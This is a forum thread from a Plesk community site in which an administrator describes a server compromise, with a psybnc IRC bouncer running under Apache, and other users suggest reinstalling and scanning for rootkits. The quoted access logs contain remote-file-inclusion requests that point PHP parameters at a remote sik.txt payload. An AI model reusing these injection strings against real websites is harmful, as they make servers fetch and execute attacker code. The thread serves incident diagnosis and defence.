• Our team is looking to connect with folks who use email services provided by Plesk, or a premium service. If you'd like to be part of the discovery process and share your experiences, we invite you to complete this short screening survey. If your responses match the persona we are looking for, you'll receive a link to schedule a call at your convenience. We look forward to hearing from you!
  • We are looking for U.S.-based freelancer or agency working with SEO or WordPress for a quick 30-min interviews to gather feedback on XOVI, a successful German SEO tool we’re looking to launch in the U.S.
    If you qualify and participate, you’ll receive a $30 Amazon gift card as a thank-you. Please apply here. Thanks for helping shape a better SEO product for agencies!
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

Someone installed psybnc in my server

S

sysoptech

Guest
Hi:
After my server hosting provider complained about an http exploitation attempt from my server to www.attackeddomain.com (I made up that domain to protect the innocent):

my.server.ip.address. - - [18/Jan/2009:00:08:53 +0200]"GET /forum/?cfg[bbs_dir]=http://www.attackeddomain.com/sik.txt? HTTP/1.1" 30$
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /forum/install/index.php HTTP/1.1" 404 111 "-""libwww-perl/5.805"
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /?cfg[bbs_dir]=http://www..attackeddomain.com/sik.txt? HTTP/1.1" 200 1257$2

I checked in my server and found entries like this in httpd/apache access_log:

127.0.0.1 - - [27/Jan/2009:15:23:46 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:15:54:41 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:16:20:40 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"

I've just found the following using lsof

psybnc 4863 apache cwd DIR 3,3 4096 12681232 /tmp/.psy
psybnc 4863 apache rtd DIR 3,3 4096 2 /
psybnc 4863 apache txt REG 3,3 202544 12681344 /tmp/.psy/psybnc (deleted)
psybnc 4863 apache mem REG 3,3 125736 14680066 /lib/ld-2.5.so
psybnc 4863 apache mem REG 3,3 1602128 14680082 /lib/libc-2.5.so
psybnc 4863 apache mem REG 3,3 208352 14680099 /lib/libm-2.5.so
psybnc 4863 apache mem REG 3,3 76400 14680121 /lib/libresolv-2.5.so
psybnc 4863 apache mem REG 3,3 21788 14680102 /lib/libnss_dns-2.5.so
psybnc 4863 apache mem REG 3,3 46680 14680104 /lib/libnss_files-2.5.so
psybnc 4863 apache 0r FIFO 0,6 14823 pipe
psybnc 4863 apache 1w CHR 1,3 1168 /dev/null
psybnc 4863 apache 2w CHR 1,3 1168 /dev/null
psybnc 4863 apache 3u IPv4 14844 TCP *:dc (LISTEN)
psybnc 4863 apache 4w REG 3,3 1222 12681223 /tmp/.psy/log/psybnc.log (deleted)
psybnc 4863 apache 5w REG 3,3 6 12681341 /tmp/.psy/psybnc.pid
psybnc 4863 apache 6w REG 3,3 0 12681226 /tmp/.psy/log/USER1.TRL
psybnc 4863 apache 7u sock 0,5 2613780 can't identify protocol

My server is a Red Hat Enterprise Linux Server release 5.2 with Plesk 8.6 that I use to host virtual domains.

My guess is that someone used a script to get access to my server and installed psybnc. I don't know how to get rid of psybnc and how to make sure that there's no other software the bad guys may have installed. I would need to know how to prevent this to happen again in my server.

Can anyone give me some tips?

Best Regards

Raul
 
You are already vulnerable ....

You are already vulnerable .... you should reinstall then consider useing ASL and other security meassures.
 
Hi:
Thanks for your prompt answer.
My server has about 200 hosting sites. Is there any way to find out which script or web page files were vulnerable or were used to perform this attack? If I was to reinstall software in this server I would need to copy my customer's hosting site files and I would like to prevent this incident to happen again by isolating the vulnerable scripts.
Is there any other security setting I may try besides using ASL ?

Best Regards

Raul
 
psybnc is a IRC bouncer, it doesn't attack domains, it just serves as an intermediary/proxy between a client/user and an IRC server and it was probably installed by one of your clients in order to be able to chat in IRC while at work because the firewall there blocks the direct connection (http://www.psybnc.at/about.html).

Besides, the user agent on the attacks is libwww-perl/5.805 which is a perl library, and thus it's something written in Perl that has been doing the attacks (psybnc isn't).
 
Last edited:
I know that an IRC bot is running because I can see it being denied outbound in our firewall. But I cannot seem to locate it.

What are some tips that might help me locate the source / web site?
 
Could be rootkitted, which is going to hide the process(es) from utilities like ps, lsof, etc. You can try digging deeper with statically compiled builds of chkrootkit or rkhunter. Otherwise you need to boot off of some trusted media to do a more thorough forensics investigation.
 
You must log in or register to reply here.

Similar threads

M
Question I have an apache process every 10 minutes
Replies
3
Views
1K
mr-wolf
M
T
Upgrade Phpbb Now!!! 2.0.15
Replies
1
Views
3K
Outlaw
O
Back
Top